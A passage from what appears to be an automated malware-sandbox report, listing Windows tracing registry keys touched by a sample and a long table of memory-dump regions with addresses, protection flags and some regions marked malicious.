HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
There are 211 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
6591000
heap
page read and write
 malicious
5E8C000
heap
page read and write
 malicious
2D5000
unkown
page read and write
 malicious
3C18000
trusted library allocation
page read and write
 malicious
843000
unkown
page execute and read and write
 malicious
61D0000
heap
page read and write
 malicious
109000
unkown
page read and write
 malicious
843000
unkown
page execute and read and write
 malicious
402000
remote allocation
page execute and read and write
 malicious
400000
remote allocation
page execute and read and write
 malicious
34F0000
direct allocation
page execute and read and write
 malicious
3520000
direct allocation
page read and write
 malicious
3530000
direct allocation
page read and write
 malicious
659D000
heap
page read and write
 malicious
60C4000
heap
page read and write
 malicious
400000
unkown
page execute and read and write
 malicious
10BF000
heap
page read and write
 malicious
432000
unkown
page readonly
 malicious
1B6A000
heap
page read and write
 malicious
3500000
direct allocation
page execute and read and write
 malicious
400000
unkown
page execute and read and write
 malicious
6390000
trusted library allocation
page read and write
E85D3FE000
stack
page read and write
2E49000
trusted library allocation
page read and write
5ED6000
heap
page read and write
6123000
heap
page read and write
61D6000
heap
page read and write
2AFFD2EE000
heap
page read and write
612B000
heap
page read and write
61C9000
heap
page read and write
463B000
heap
page read and write
326000
unkown
page read and write
3AB000
unkown
page write copy
61D0000
trusted library allocation
page read and write
6275000
heap
page read and write
1C5000
heap
page read and write
61D6000
heap
page read and write
5131000
heap
page read and write
1404A6000
unkown
page execute and write copy
1120000
direct allocation
page read and write
61F6000
heap
page read and write
7FF8490D2000
trusted library allocation
page read and write
9CEE000
stack
page read and write
1A20000
heap
page read and write
5E88000
heap
page read and write
6652000
heap
page read and write
1650000
direct allocation
page read and write
6129000
heap
page read and write
60FB000
heap
page read and write
63DA000
heap
page read and write
1EB7000
heap
page read and write
674C000
heap
page read and write
65C7000
heap
page read and write
6653000
heap
page read and write
61C1000
heap
page read and write
14049E000
unkown
page execute and write copy
3410000
remote allocation
page read and write
13BB000
heap
page read and write
61E7000
heap
page read and write
367F000
stack
page read and write
561000
heap
page read and write
618A000
heap
page read and write
4641000
heap
page read and write
61E1000
heap
page read and write
4340000
trusted library allocation
page read and write
30E0000
direct allocation
page read and write
283CC000
heap
page read and write
2DF5000
trusted library allocation
page read and write
1FEC000
direct allocation
page read and write
3671000
heap
page read and write
7FF4588B0000
trusted library allocation
page execute and read and write
1090000
heap
page read and write
2AFFB09A000
heap
page read and write
4680000
heap
page read and write
653F000
heap
page read and write
65BB000
heap
page read and write
401000
unkown
page execute and write copy
1BEB000
heap
page read and write
373D000
stack
page read and write
6511000
heap
page read and write
2B99000
heap
page read and write
13BA000
heap
page read and write
2AFFB036000
heap
page read and write
2E53000
trusted library allocation
page read and write
464E000
heap
page read and write
463C000
heap
page read and write
1BE8D000
stack
page read and write
5130000
trusted library allocation
page read and write
56E000
heap
page read and write
140001000
unkown
page execute and write copy
2F65000
trusted library allocation
page read and write
617F000
stack
page read and write
2E31000
heap
page read and write
1F0000
direct allocation
page read and write
4C0000
heap
page read and write
46C1000
heap
page read and write
1403E1000
unkown
page execute and read and write
35BD0000
heap
page read and write
5E5F000
heap
page read and write
143000
stack
page read and write
61D8000
heap
page read and write
400000
unkown
page execute and read and write
3671000
heap
page read and write
624000
unkown
page execute and read and write
12C0000
heap
page read and write
60F9000
heap
page read and write
6328000
heap
page read and write
1000000
heap
page read and write
46E000
heap
page read and write
26A2EC60000
remote allocation
page read and write
61AA000
heap
page read and write
6104000
heap
page read and write
DC5000
heap
page read and write
102D000
unkown
page execute and read and write
2AF801EE000
trusted library allocation
page read and write
1064000
unkown
page execute and read and write
45A000
heap
page read and write
612F000
heap
page read and write
6CD000
heap
page read and write
6124000
heap
page read and write
2E6C000
trusted library allocation
page read and write
6209000
heap
page read and write
664A000
heap
page read and write
32B1000
heap
page read and write
6536000
heap
page read and write
3307000
heap
page read and write
60B2000
heap
page read and write
642C000
heap
page read and write
140278000
unkown
page write copy
46AE000
heap
page read and write
39F000
unkown
page readonly
32B1000
heap
page read and write
F1F000
stack
page read and write
65BB000
heap
page read and write
32B1000
heap
page read and write
4787000
heap
page read and write
6180000
heap
page read and write
5F60000
heap
page read and write
6136000
heap
page read and write
193B000
heap
page read and write
6580000
heap
page read and write
7868000
heap
page read and write
1EB6000
heap
page read and write
679D000
heap
page read and write
6307000
heap
page read and write
2E31000
heap
page read and write
61C1000
heap
page read and write
13D6A484000
unkown
page read and write
5E89000
heap
page read and write
14037B000
unkown
page execute and read and write
66B000
heap
page read and write
5E72000
heap
page read and write
EEF000
stack
page read and write
56E000
heap
page read and write
7FF8490B8000
trusted library allocation
page read and write
55F0000
heap
page read and write
5E3E000
stack
page read and write
4615000
heap
page read and write
46B5000
heap
page read and write
103E000
heap
page read and write
270000
heap
page read and write
2DA6000
trusted library allocation
page read and write
1110000
trusted library allocation
page execute and read and write
6161000
heap
page read and write
2E31000
heap
page read and write
466E000
heap
page read and write
EC0000
trusted library allocation
page read and write
554000
heap
page read and write
6287000
heap
page read and write
F30000
trusted library allocation
page read and write
6129000
heap
page read and write
61B4000
heap
page read and write
540000
unkown
page execute and read and write
1ED4000
heap
page read and write
32B1000
heap
page read and write
61C9000
heap
page read and write
63C000
remote allocation
page execute and read and write
6590000
trusted library allocation
page read and write
6273000
heap
page read and write
1BA7000
heap
page read and write
5E97000
heap
page read and write
388D000
trusted library allocation
page read and write
51C0000
trusted library allocation
page read and write
185DCA39000
heap
page read and write
20202802000
trusted library allocation
page read and write
1674000
heap
page read and write
2DE0000
trusted library allocation
page read and write
2B62000
heap
page read and write
653F000
heap
page read and write
D8E000
stack
page read and write
1100000
trusted library allocation
page read and write
106E000
unkown
page execute and read and write
6648000
heap
page read and write
1290000
direct allocation
page read and write
4363000
heap
page read and write
46C7000
heap
page read and write
6274000
heap
page read and write
6554000
heap
page read and write
6104000
heap
page read and write
6580000
heap
page read and write
14037D000
unkown
page execute and write copy
5E88000
heap
page read and write
6311000
heap
page read and write
13BA000
heap
page read and write
1F0000
heap
page read and write
474D000
heap
page read and write
6DAF000
stack
page read and write
6590000
trusted library allocation
page read and write
11B4000
heap
page read and write
18A6000
direct allocation
page read and write
2DE7000
trusted library allocation
page read and write
3671000
heap
page read and write
5F50000
remote allocation
page read and write
445000
unkown
page readonly
2EFE000
trusted library allocation
page read and write
6308000
heap
page read and write
1EB6000
heap
page read and write
8DF000
stack
page read and write
32B1000
heap
page read and write
283D5000
heap
page read and write
1120000
direct allocation
page read and write
61D0000
trusted library allocation
page read and write
55B8000
trusted library section
page read and write
652E000
heap
page read and write
400000
unkown
page readonly
62A3000
heap
page read and write
2F2F000
trusted library allocation
page read and write
52D0000
trusted library allocation
page read and write
62B8000
heap
page read and write
4643000
heap
page read and write
614A000
heap
page read and write
2B74000
heap
page read and write
6201000
heap
page read and write
400000
unkown
page readonly
400000
unkown
page readonly
CF1000
unkown
page execute read
2B46000
heap
page read and write
5E7D000
heap
page read and write
61AA000
heap
page read and write
DED000
trusted library allocation
page execute and read and write
11B4000
heap
page read and write
E4A000
unkown
page readonly
F70000
heap
page read and write
2E85000
trusted library allocation
page read and write
5EC3000
heap
page read and write
14050A000
unkown
page execute and write copy
6119000
heap
page read and write
6530000
heap
page read and write
2E31000
heap
page read and write
16D0000
heap
page read and write
DD3000
trusted library allocation
page execute and read and write
2B80000
heap
page read and write
3ED3000
heap
page read and write
1650000
direct allocation
page read and write
517D000
heap
page read and write
36A0000
heap
page read and write
5E5B000
heap
page read and write
61E5000
heap
page read and write
462B000
heap
page read and write
1023000
unkown
page execute and read and write
1F0000
direct allocation
page read and write
2AFFD2A6000
heap
page read and write
6522000
heap
page read and write
6181000
heap
page read and write
6201000
heap
page read and write
411000
unkown
page readonly
517F000
heap
page read and write
5882000
heap
page read and write
92E000
heap
page read and write
6151000
heap
page read and write
121A000
heap
page read and write
4744000
heap
page read and write
1404AA000
unkown
page execute and write copy
2F78000
trusted library allocation
page read and write
6290000
heap
page read and write
400000
unkown
page readonly
63D4000
heap
page read and write
2DDE000
trusted library allocation
page read and write
1F0000
direct allocation
page read and write
651B000
heap
page read and write
61D9000
heap
page read and write
DC0000
heap
page read and write
5EEB000
heap
page read and write
13D6A702000
heap
page read and write
61B4000
heap
page read and write
400000
unkown
page readonly
2EB3000
trusted library allocation
page read and write
1330000
heap
page read and write
611E000
heap
page read and write
105C000
heap
page read and write
185DC9C0000
heap
page read and write
2AFFC9A0000
heap
page read and write
6104000
heap
page read and write
46A7000
heap
page read and write
65EF000
unkown
page read and write
274E000
heap
page read and write
6511000
heap
page read and write
61D5000
heap
page read and write
6281000
heap
page read and write
E7FE000
stack
page read and write
4AFF000
heap
page read and write
561000
heap
page read and write
462B000
heap
page read and write
1403D3000
unkown
page execute and write copy
1C34000
heap
page read and write
6119000
heap
page read and write
490000
heap
page read and write
7472000
trusted library allocation
page read and write
16F000
stack
page read and write
620A000
heap
page read and write
158F000
stack
page read and write
6647000
heap
page read and write
1404AE000
unkown
page execute and write copy
3410000
remote allocation
page read and write
5A6D000
stack
page read and write
CC4000
heap
page read and write
2846D000
heap
page read and write
466E000
heap
page read and write
3671000
heap
page read and write
6D1000
heap
page read and write
46B0000
heap
page read and write
3671000
heap
page read and write
1328000
heap
page read and write
627E000
heap
page read and write
DE0000
trusted library allocation
page read and write
401000
unkown
page execute and write copy
7FF848E02000
trusted library allocation
page read and write
2BD0000
trusted library allocation
page read and write
5132000
heap
page read and write
2B74000
heap
page read and write
140500000
unkown
page execute and write copy
763000
unkown
page readonly
5134000
trusted library allocation
page read and write
1650000
direct allocation
page read and write
61DA000
heap
page read and write
4258000
trusted library allocation
page read and write
60F2000
heap
page read and write
59D000
stack
page read and write
10A1000
heap
page read and write
2B90000
heap
page read and write
6511000
heap
page read and write
126D000
heap
page read and write
61D9000
heap
page read and write
4680000
heap
page read and write
61E4000
heap
page read and write
7FF849260000
trusted library allocation
page read and write
46C2000
heap
page read and write
400000
remote allocation
page execute and read and write
54EA000
trusted library section
page read and write
2B88000
heap
page read and write
3671000
heap
page read and write
61E7000
heap
page read and write
2AFFD260000
heap
page read and write
3671000
heap
page read and write
51F0000
heap
page read and write
6510000
trusted library allocation
page read and write
176F000
heap
page read and write
6104000
heap
page read and write
2AD1000
trusted library allocation
page read and write
2243E000
heap
page read and write
380000
unkown
page readonly
185DC9F0000
heap
page read and write
2D74000
trusted library allocation
page read and write
6535000
heap
page read and write
62FB000
stack
page read and write
FBE000
heap
page read and write
6189000
heap
page read and write
2BF1000
trusted library allocation
page read and write
FB9000
heap
page read and write
283D8000
heap
page read and write
11B4000
heap
page read and write
6134000
heap
page read and write
655C000
heap
page read and write
2ED2000
trusted library allocation
page read and write
2F1C000
trusted library allocation
page read and write
2DDC000
trusted library allocation
page read and write
6511000
heap
page read and write
2F69000
trusted library allocation
page read and write
2749000
heap
page read and write
3671000
heap
page read and write
E9E000
unkown
page execute and read and write
54CC000
heap
page read and write
46C1000
heap
page read and write
61B4000
heap
page read and write
2AFFD2F6000
heap
page read and write
2234B000
heap
page read and write
400000
unkown
page readonly
15F30000
heap
page read and write
65B0000
heap
page read and write
6C7000
unkown
page execute and read and write
22352000
heap
page read and write
33B0000
direct allocation
page read and write
61E1000
heap
page read and write
400000
unkown
page readonly
2D55000
trusted library allocation
page read and write
623B000
heap
page read and write
5E86000
heap
page read and write
628F000
heap
page read and write
6150000
heap
page read and write
E8C000
unkown
page read and write
2B40000
heap
page read and write
6522000
heap
page read and write
1941000
heap
page read and write
FB8000
heap
page read and write
46C7000
heap
page read and write
920000
heap
page read and write
4787000
heap
page read and write
E85CBFF000
stack
page read and write
65B5000
heap
page read and write
550000
heap
page read and write
17B5000
heap
page read and write
1FE8000
direct allocation
page read and write
465C000
heap
page read and write
7FF849210000
trusted library allocation
page read and write
1B10000
trusted library allocation
page read and write
190C000
heap
page read and write
5E86000
heap
page read and write
2EBC000
trusted library allocation
page read and write
10D1000
unkown
page execute and write copy
2BBE000
stack
page read and write
52B0000
trusted library allocation
page execute and read and write
6279000
heap
page read and write
6192000
heap
page read and write
6297000
heap
page read and write
2AFFC9B5000
heap
page read and write
D00000
unkown
page readonly
46AE000
heap
page read and write
FB0000
heap
page read and write
7FF8490BA000
trusted library allocation
page read and write
32B1000
heap
page read and write
61C1000
heap
page read and write
6181000
heap
page read and write
2B88000
heap
page read and write
2F30000
heap
page read and write
22350000
heap
page read and write
61F6000
heap
page read and write
46C1000
heap
page read and write
6279000
heap
page read and write
5290000
heap
page read and write
A1C000
unkown
page execute read
53F000
heap
page read and write
679E0000
unkown
page write copy
62B8000
heap
page read and write
5E72000
heap
page read and write
62B8000
heap
page read and write
2B9C000
heap
page read and write
62B8000
heap
page read and write
468A000
heap
page read and write
679DE000
unkown
page read and write
2B69000
heap
page read and write
2B95000
heap
page read and write
1F0000
direct allocation
page read and write
18A0000
direct allocation
page read and write
61D9000
heap
page read and write
664C000
heap
page read and write
61CA000
heap
page read and write
651B000
heap
page read and write
66BB000
heap
page read and write
61D8000
heap
page read and write
66BB000
heap
page read and write
2CF5000
trusted library allocation
page read and write
1C0000
heap
page read and write
462B000
heap
page read and write
596D000
stack
page read and write
30F0000
direct allocation
page read and write
185DCA6B000
heap
page read and write
CF0000
unkown
page readonly
613E000
heap
page read and write
65BB000
heap
page read and write
61D0000
trusted library allocation
page read and write
627F000
heap
page read and write
6141000
heap
page read and write
2B92000
heap
page read and write
5E86000
heap
page read and write
2747000
heap
page read and write
46B0000
heap
page read and write
2236C000
heap
page read and write
6598000
heap
page read and write
1C280000
trusted library allocation
page read and write
61D0000
trusted library allocation
page read and write
6208000
heap
page read and write
35AE000
stack
page read and write
2AFFB2F0000
trusted library allocation
page read and write
528000
remote allocation
page execute and read and write
26A2E62B000
heap
page read and write
3671000
heap
page read and write
3671000
heap
page read and write
2E66000
trusted library allocation
page read and write
2234B000
heap
page read and write
DFA000
trusted library allocation
page execute and read and write
1722000
heap
page read and write
61F9000
heap
page read and write
1D0000
heap
page read and write
2EF0000
trusted library allocation
page read and write
192A000
heap
page read and write
185DC9E0000
heap
page read and write
6EDA000
heap
page read and write
61FC000
heap
page read and write
515000
unkown
page readonly
140277000
unkown
page execute and write copy
2E3C000
trusted library allocation
page read and write
5359000
heap
page read and write
61C1000
heap
page read and write
1F0000
direct allocation
page read and write
401000
unkown
page execute read
1650000
direct allocation
page read and write
1404A4000
unkown
page execute and write copy
2E31000
heap
page read and write
6545000
heap
page read and write
435F000
heap
page read and write
5ED6000
heap
page read and write
185DCB02000
heap
page read and write
2B7F000
heap
page read and write
2B94000
heap
page read and write
5E59000
heap
page read and write
5F50000
remote allocation
page read and write
630C000
heap
page read and write
62B8000
heap
page read and write
8F0000
heap
page read and write
6274000
heap
page read and write
65C2000
heap
page read and write
2AF801AD000
trusted library allocation
page read and write
6180000
heap
page read and write
2AFFDD50000
heap
page read and write
1C34000
heap
page read and write
515F000
heap
page read and write
6590000
trusted library allocation
page read and write
11B4000
heap
page read and write
FCB000
stack
page read and write
61D0000
trusted library allocation
page read and write
1BECE000
stack
page read and write
62B8000
heap
page read and write
43B000
unkown
page execute read
61D8000
heap
page read and write
618D000
heap
page read and write
7FF849250000
trusted library allocation
page read and write
3671000
heap
page read and write
6125000
heap
page read and write
E96D000
stack
page read and write
347C000
heap
page read and write
65B4000
heap
page read and write
5440000
heap
page execute and read and write
63DB000
heap
page read and write
1B54000
heap
page execute and read and write
2E31000
heap
page read and write
EFE000
stack
page read and write
465C000
heap
page read and write
26A2E4C0000
heap
page read and write
2E70000
trusted library allocation
page read and write
60D0000
heap
page read and write
61C9000
heap
page read and write
19BE000
heap
page read and write
1F98000
direct allocation
page read and write
61D0000
trusted library allocation
page read and write
1E87000
heap
page read and write
13D6A439000
heap
page read and write
47AD000
heap
page read and write
4680000
heap
page read and write
140211000
unkown
page execute and read and write
22365000
heap
page read and write
420000
unkown
page write copy
100A000
heap
page read and write
236F000
stack
page read and write
22346000
heap
page read and write
60E7000
heap
page read and write
362E000
stack
page read and write
651E000
heap
page read and write
1DDC000
unkown
page readonly
50C1000
heap
page read and write
2E55000
trusted library allocation
page read and write
2B9C000
heap
page read and write
61EA000
heap
page read and write
14049C000
unkown
page execute and write copy
41B000
unkown
page readonly
2B86000
heap
page read and write
1021000
unkown
page execute and read and write
1404B0000
unkown
page execute and write copy
812000
unkown
page execute and read and write
4327000
trusted library allocation
page read and write
2AF8003B000
trusted library allocation
page read and write
702C000
stack
page read and write
61B7000
heap
page read and write
1910000
heap
page read and write
1C10000
heap
page read and write
6118000
heap
page read and write
613B000
heap
page read and write
2AFFB023000
trusted library allocation
page read and write
1290000
direct allocation
page read and write
20BE000
stack
page read and write
2E31000
heap
page read and write
6104000
heap
page read and write
1A3E000
heap
page read and write
6520000
heap
page read and write
6307000
heap
page read and write
B8D68FE000
unkown
page readonly
1E40000
heap
page read and write
5E88000
heap
page read and write
6590000
trusted library allocation
page read and write
3671000
heap
page read and write
381F000
stack
page read and write
437000
unkown
page read and write
3671000
heap
page read and write
41B000
unkown
page readonly
1031000
unkown
page execute and read and write
2DD0000
remote allocation
page read and write
592E000
stack
page read and write
6653000
heap
page read and write
3671000
heap
page read and write
BB0000
heap
page read and write
7FF848E0D000
trusted library allocation
page execute and read and write
7FF8491A0000
trusted library allocation
page read and write
2F6B000
trusted library allocation
page read and write
4675000
heap
page read and write
1120000
direct allocation
page read and write
5D3E000
stack
page read and write
16137000
heap
page read and write
209E000
heap
page read and write
62B8000
heap
page read and write
11AF000
stack
page read and write
7FF849194000
trusted library allocation
page read and write
6590000
trusted library allocation
page read and write
6510000
trusted library allocation
page read and write
1BFE000
heap
page read and write
5E97000
heap
page read and write
6792000
heap
page read and write
6192000
heap
page read and write
6119000
heap
page read and write
2F09000
trusted library allocation
page read and write
321C000
stack
page read and write
12FC000
heap
page read and write
3671000
heap
page read and write
465E000
heap
page read and write
4659000
heap
page read and write
2234B000
heap
page read and write
2235E000
heap
page read and write
61C1000
heap
page read and write
65D2000
heap
page read and write
60F1000
heap
page read and write
2B86000
heap
page read and write
2B9C000
heap
page read and write
2B93000
heap
page read and write
2B8E000
heap
page read and write
2B99000
heap
page read and write
5F4F000
heap
page read and write
2B4B000
heap
page read and write
572E000
stack
page read and write
109D000
unkown
page execute and read and write
1159000
heap
page read and write
2AFFB030000
heap
page read and write
20202025000
heap
page read and write
6274000
heap
page read and write
14050E000
unkown
page execute and write copy
617A000
heap
page read and write
2D8F000
trusted library allocation
page read and write
1674000
heap
page read and write
185DCA3E000
heap
page read and write
13D6A478000
heap
page read and write
2DEB000
trusted library allocation
page read and write
513E000
heap
page read and write
5F60000
heap
page read and write
46A7000
heap
page read and write
384A000
trusted library allocation
page read and write
663B000
heap
page read and write
32B1000
heap
page read and write
6157000
heap
page read and write
1404A0000
unkown
page execute and write copy
2AF90009000
trusted library allocation
page read and write
7E8AD7C000
stack
page read and write
6591000
heap
page read and write
623B000
heap
page read and write
62B8000
heap
page read and write
5EEB000
heap
page read and write
2EB5000
trusted library allocation
page read and write
2E31000
heap
page read and write
2AFFADD2000
unkown
page readonly
22342000
heap
page read and write
3671000
heap
page read and write
1404AA000
unkown
page execute and write copy
2AFFADD0000
unkown
page readonly
324000
unkown
page readonly
140000000
unkown
page readonly
5F50000
heap
page read and write
61C1000
heap
page read and write
5E88000
heap
page read and write
6125000
heap
page read and write
4634000
heap
page read and write
34520000
heap
page read and write
1650000
direct allocation
page read and write
1025000
unkown
page execute and read and write
2B7B000
stack
page read and write
10EE000
stack
page read and write
5F67000
heap
page read and write
1C12E000
stack
page read and write
2BB6000
heap
page read and write
1052000
heap
page read and write
15B90000
heap
page read and write
468A000
heap
page read and write
1BFD000
heap
page read and write
46C7000
heap
page read and write
550000
heap
page read and write
1927000
heap
page read and write
223DB000
heap
page read and write
54C000
heap
page read and write
5103000
heap
page read and write
65AE000
heap
page read and write
15E26000
heap
page read and write
7FF849160000
trusted library allocation
page read and write
5E73000
heap
page read and write
73F000
unkown
page execute and read and write
641C000
heap
page read and write
51F0000
heap
page read and write
22341000
heap
page read and write
4697000
heap
page read and write
2020202B000
heap
page read and write
61E7000
heap
page read and write
4634000
heap
page read and write
F6E000
stack
page read and write
419000
unkown
page write copy
663A000
heap
page read and write
2234B000
heap
page read and write
1404F8000
unkown
page execute and read and write
6181000
heap
page read and write
61D0000
trusted library allocation
page read and write
613F000
heap
page read and write
1903000
heap
page read and write
26A2E600000
heap
page read and write
651A000
heap
page read and write
283A0000
heap
page read and write
411000
unkown
page readonly
1EC1000
heap
page read and write
46C1000
heap
page read and write
1403D4000
unkown
page execute and write copy
46B0000
heap
page read and write
6104000
heap
page read and write
6590000
trusted library allocation
page read and write
61D8000
heap
page read and write
61E00000
direct allocation
page execute and read and write
13D6A43B000
unkown
page read and write
2B74000
heap
page read and write
5F62000
heap
page read and write
11BE000
stack
page read and write
40BE000
stack
page read and write
6125000
heap
page read and write
6104000
heap
page read and write
6A4000
unkown
page execute and read and write
35AD7000
heap
page read and write
6590000
trusted library allocation
page read and write
1404B5000
unkown
page execute and write copy
726000
unkown
page execute and read and write
26A2E702000
heap
page read and write
4680000
heap
page read and write
2B54000
heap
page read and write
463F000
heap
page read and write
5E4B000
heap
page read and write
6274000
heap
page read and write
61D5000
heap
page read and write
65BB000
heap
page read and write
665A000
heap
page read and write
2250000
direct allocation
page read and write
22344000
heap
page read and write
1F0000
direct allocation
page read and write
401000
unkown
page execute read
22344000
heap
page read and write
2B9C000
heap
page read and write
1404FC000
unkown
page execute and write copy
5E7D000
heap
page read and write
5E86000
heap
page read and write
623B000
heap
page read and write
61C9000
heap
page read and write
61D9000
heap
page read and write
1BFE000
heap
page read and write
1A3A000
heap
page read and write
4C763DE000
stack
page read and write
6181000
heap
page read and write
525B000
heap
page read and write
49D000
stack
page read and write
2B74000
heap
page read and write
1404B2000
unkown
page execute and write copy
7FF849074000
trusted library allocation
page read and write
2E31000
heap
page read and write
400000
remote allocation
page execute and read and write
2AFFCB90000
heap
page execute and read and write
13D6A43B000
unkown
page read and write
6511000
heap
page read and write
2B9C000
heap
page read and write
61D9000
heap
page read and write
5E86000
heap
page read and write
5ECE000
heap
page read and write
1B40000
heap
page read and write
2F02000
trusted library allocation
page read and write
11B4000
heap
page read and write
1234000
heap
page read and write
2ECA000
trusted library allocation
page read and write
1F0000
direct allocation
page read and write
1404A6000
unkown
page execute and write copy
6648000
heap
page read and write
101D000
unkown
page execute and read and write
2AFFD390000
heap
page execute and read and write
4651000
heap
page read and write
11FA000
heap
page read and write
72EF000
stack
page read and write
13AE000
heap
page read and write
5CEF000
stack
page read and write
1338000
heap
page read and write
B8D667E000
stack
page read and write
400000
unkown
page readonly
62B8000
heap
page read and write
61D9000
heap
page read and write
52E000
remote allocation
page execute and read and write
1290000
direct allocation
page read and write
3671000
heap
page read and write
199000
stack
page read and write
7FF849213000
trusted library allocation
page read and write
54C000
heap
page read and write
1748000
heap
page read and write
22343000
heap
page read and write
13D6A43B000
unkown
page read and write
6580000
heap
page read and write
462E000
heap
page read and write
E72000
unkown
page write copy
2E4E7000
heap
page read and write
6515000
heap
page read and write
61C9000
heap
page read and write
6285000
heap
page read and write
400000
unkown
page readonly
37A0000
heap
page read and write
22350000
heap
page read and write
61D8000
heap
page read and write
17AE000
stack
page read and write
462E000
heap
page read and write
6300000
heap
page read and write
3671000
heap
page read and write
61D4000
heap
page read and write
7FF8490E0000
trusted library allocation
page read and write
2236C000
heap
page read and write
1346000
heap
page read and write
11F0000
unkown
page execute read
611E000
heap
page read and write
6255000
heap
page read and write
10A9000
unkown
page execute and read and write
2B86000
heap
page read and write
E9A000
unkown
page readonly
2E81000
heap
page read and write
326000
unkown
page write copy
6591000
heap
page read and write
60FA000
heap
page read and write
540000
unkown
page execute and read and write
35EE000
stack
page read and write
197000
stack
page read and write
5FBE000
stack
page read and write
5EA9000
heap
page read and write
2B8D000
heap
page read and write
6104000
heap
page read and write
14050E000
unkown
page execute and write copy
32B1000
heap
page read and write
13D6A477000
heap
page read and write
1160000
heap
page read and write
60C0000
heap
page read and write
7FF849121000
trusted library allocation
page read and write
3671000
heap
page read and write
3DBE000
stack
page read and write
61E1000
heap
page read and write
1F0000
direct allocation
page read and write
2FF0000
heap
page read and write
1310000
heap
page read and write
422000
unkown
page write copy
ED4000
trusted library allocation
page read and write
62B9000
heap
page read and write
6304000
heap
page read and write
430000
heap
page read and write
1404A8000
unkown
page execute and write copy
528D000
heap
page read and write
14D0000
heap
page read and write
3671000
heap
page read and write
2B99000
heap
page read and write
1920000
heap
page read and write
5E97000
heap
page read and write
79F000
unkown
page execute and read and write
2DA4000
trusted library allocation
page read and write
1FA0000
remote allocation
page read and write
2E2B000
stack
page read and write
5A90000
trusted library allocation
page read and write
651B000
heap
page read and write
4C7697E000
unkown
page readonly
38A1000
trusted library allocation
page read and write
46C000
remote allocation
page execute and read and write
6284000
heap
page read and write
554000
heap
page read and write
615E000
stack
page read and write
1995000
heap
page read and write
14050C000
unkown
page execute and write copy
2AFFB310000
heap
page read and write
6104000
heap
page read and write
62B8000
heap
page read and write
60F2000
heap
page read and write
618D000
heap
page read and write
6195000
heap
page read and write
561000
heap
page read and write
4681000
heap
page read and write
14053F000
unkown
page execute and read and write
140504000
unkown
page execute and write copy
2250000
direct allocation
page read and write
6530000
heap
page read and write
7E8AA7B000
stack
page read and write
618A000
heap
page read and write
6B18000
heap
page read and write
2E98000
trusted library allocation
page read and write
6CD000
heap
page read and write
1367000
heap
page read and write
623B000
heap
page read and write
4640000
heap
page read and write
583F000
heap
page read and write
6180000
heap
page read and write
2BA0000
heap
page read and write
1450000
heap
page read and write
43A000
unkown
page readonly
6119000
heap
page read and write
26A2E602000
heap
page read and write
135B000
heap
page read and write
6AB0000
heap
page read and write
1120000
direct allocation
page read and write
6623000
heap
page read and write
618D000
heap
page read and write
7FF848EB6000
trusted library allocation
page read and write
651A000
heap
page read and write
3671000
heap
page read and write
5E89000
heap
page read and write
3671000
heap
page read and write
3671000
heap
page read and write
720E000
stack
page read and write
6590000
trusted library allocation
page read and write
6152000
heap
page read and write
462B000
heap
page read and write
16DE000
heap
page read and write
1650000
direct allocation
page read and write
5719000
heap
page read and write
401000
unkown
page execute read
14054B000
unkown
page execute and write copy
647C000
heap
page read and write
1ECF000
heap
page read and write
79D000
unkown
page execute and read and write
55FE000
stack
page read and write
60AA000
heap
page read and write
19C000
stack
page read and write
6511000
heap
page read and write
4681000
heap
page read and write
1057000
heap
page read and write
6590000
trusted library allocation
page read and write
4641000
heap
page read and write
1F0000
direct allocation
page read and write
464E000
heap
page read and write
2DA0000
direct allocation
page read and write
6274000
heap
page read and write
529C000
heap
page read and write
1C5E000
stack
page read and write
61CA000
heap
page read and write
2B80000
heap
page read and write
13AE000
heap
page read and write
5E72000
heap
page read and write
6510000
trusted library allocation
page read and write
18B0000
direct allocation
page read and write
19FF000
unkown
page readonly
185DCA44000
heap
page read and write
2DAC000
trusted library allocation
page read and write
62DC000
heap
page read and write
627E000
heap
page read and write
6181000
heap
page read and write
2D40000
trusted library allocation
page read and write
4794000
heap
page read and write
401000
unkown
page execute and write copy
6279000
heap
page read and write
2B91000
heap
page read and write
61B4000
heap
page read and write
401000
unkown
page execute read
2DE2000
trusted library allocation
page read and write
2E7B000
trusted library allocation
page read and write
172A000
heap
page read and write
2234B000
heap
page read and write
7FF849060000
trusted library allocation
page read and write
5AA0000
heap
page read and write
6617000
heap
page read and write
61E4000
heap
page read and write
9CF000
unkown
page readonly
5644000
heap
page read and write
3BF1000
trusted library allocation
page read and write
671D000
heap
page read and write
60F7000
heap
page read and write
63AF000
heap
page read and write
513E000
heap
page read and write
10B000
unkown
page write copy
5E89000
heap
page read and write
5E86000
heap
page read and write
2EAF000
trusted library allocation
page read and write
51B0000
heap
page read and write
5EFB000
heap
page read and write
32B0000
heap
page read and write
4D0000
direct allocation
page read and write
6711000
heap
page read and write
6279000
heap
page read and write
61C9000
heap
page read and write
50C1000
heap
page read and write
DA0000
heap
page read and write
7FF8492F0000
trusted library allocation
page read and write
628A000
heap
page read and write
1E87000
heap
page read and write
20202002000
heap
page read and write
3671000
heap
page read and write
62FD000
heap
page read and write
65BF000
heap
page read and write
46A7000
heap
page read and write
800000
